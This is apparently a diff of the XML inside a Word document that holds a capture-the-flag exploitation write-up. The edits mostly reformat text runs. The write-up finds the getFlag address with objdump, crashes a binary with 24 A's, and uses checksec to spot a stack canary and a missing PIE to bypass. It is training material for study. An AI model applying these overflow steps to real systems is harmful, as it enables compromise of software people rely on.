-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>address</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of </w:t>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2120,15 +2297,15 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>getFlag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in order to get the function pointer to call it. I obtain the address of </w:t>
+        <w:t>= 0x4011d6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2138,42 +2315,6 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>getFlag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>= 0x4011d6</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> through </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:t>objdump -d ./01</w:t>
       </w:r>
       <w:r>
@@ -2182,7 +2323,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in the commandline (or the </w:t>
+        <w:t xml:space="preserve"> in the command line (or the </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -2623,6 +2764,7 @@
           <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>line</w:t>
       </w:r>
       <w:r>
@@ -3395,9 +3537,8 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DAF7A79" wp14:editId="72AD7C07">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="739D94FF" wp14:editId="7F69F2BE">
             <wp:extent cx="5972810" cy="1223645"/>
             <wp:effectExtent l="0" t="0" r="8890" b="0"/>
             <wp:docPr id="656702294" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
@@ -3518,35 +3659,93 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TODO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -3570,7 +3769,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0292A2C7" wp14:editId="0297B3A3">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E9269D2" wp14:editId="71F26E6F">
             <wp:extent cx="5972810" cy="2037080"/>
             <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
             <wp:docPr id="387336901" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;Description automatically generated"/>
@@ -3871,23 +4070,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>n int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> variable </w:t>
+        <w:t xml:space="preserve">An int variable </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3905,55 +4088,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> is initialized to 0. The</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> first</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> prompt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>m the program</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is printed, and the response input from user is stored in the </w:t>
+        <w:t xml:space="preserve"> is initialized to 0. The first prompt from the program is printed, and the response input from user is stored in the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3989,15 +4124,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> variable. Then the program provides a hint in form of a hex value, which is a memory address </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">on the location of </w:t>
+        <w:t xml:space="preserve"> variable. Then the program provides a hint in form of a hex value, which is a memory address on the location of </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4007,64 +4134,54 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>buffer+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+        <w:t>buffer+offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>. The program asks user not to overwrite its stack, and the program terminates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>offset</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>. The program asks user not to overwrite its stack, and the program terminates.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:t>Execution</w:t>
       </w:r>
       <w:r>
@@ -4109,7 +4226,6 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Assuming this is an obscure way of asking how much input it can take before crashing, I try several different amounts of data, and the program finally crashes at 24 A’s. </w:t>
       </w:r>
     </w:p>
@@ -4149,51 +4265,53 @@
           <w:szCs w:val="32"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Observations: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:t>Observations: Execution and Disassembly</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Running </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Execution and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>checksec ./02</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Disassembly</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Running </w:t>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I see that there is a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4203,52 +4321,24 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>checksec ./02</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:t>stack canary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> present. There is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I see that there is a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>stack canary</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> present. There is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
         <w:t>No PIE</w:t>
       </w:r>
       <w:r>
@@ -4257,31 +4347,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>meaning</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it has been compiled </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">as a position dependent executable, as opposed to a position </w:t>
+        <w:t xml:space="preserve">, meaning it has been compiled as a position dependent executable, as opposed to a position </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4299,69 +4365,38 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">executable (PIE), which is neccessary to enable address space layout randomization (ASLR). ASLR is a security feature that makes sure </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">executables </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>are loaded into random address locations in virtual memory each time the program is run, so no PIE is a good precondition for exploiting the program. H</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>wever, we need to bypass the canary somehow.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:t>executable (PIE), which is neccessary to enable address space layout randomization (ASLR). ASLR is a security feature that makes sure executables are loaded into random address stlocations in virtual memory each time the program is run, so no PIE is a good precondition for exploiting the program. However, we need to bypass the canary somehow.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687E554E" wp14:editId="519B7211">
-            <wp:extent cx="4305521" cy="1168460"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C838DA9" wp14:editId="5DDE779E">
+            <wp:extent cx="5648179" cy="1532839"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1185386941" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
@@ -4383,7 +4418,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
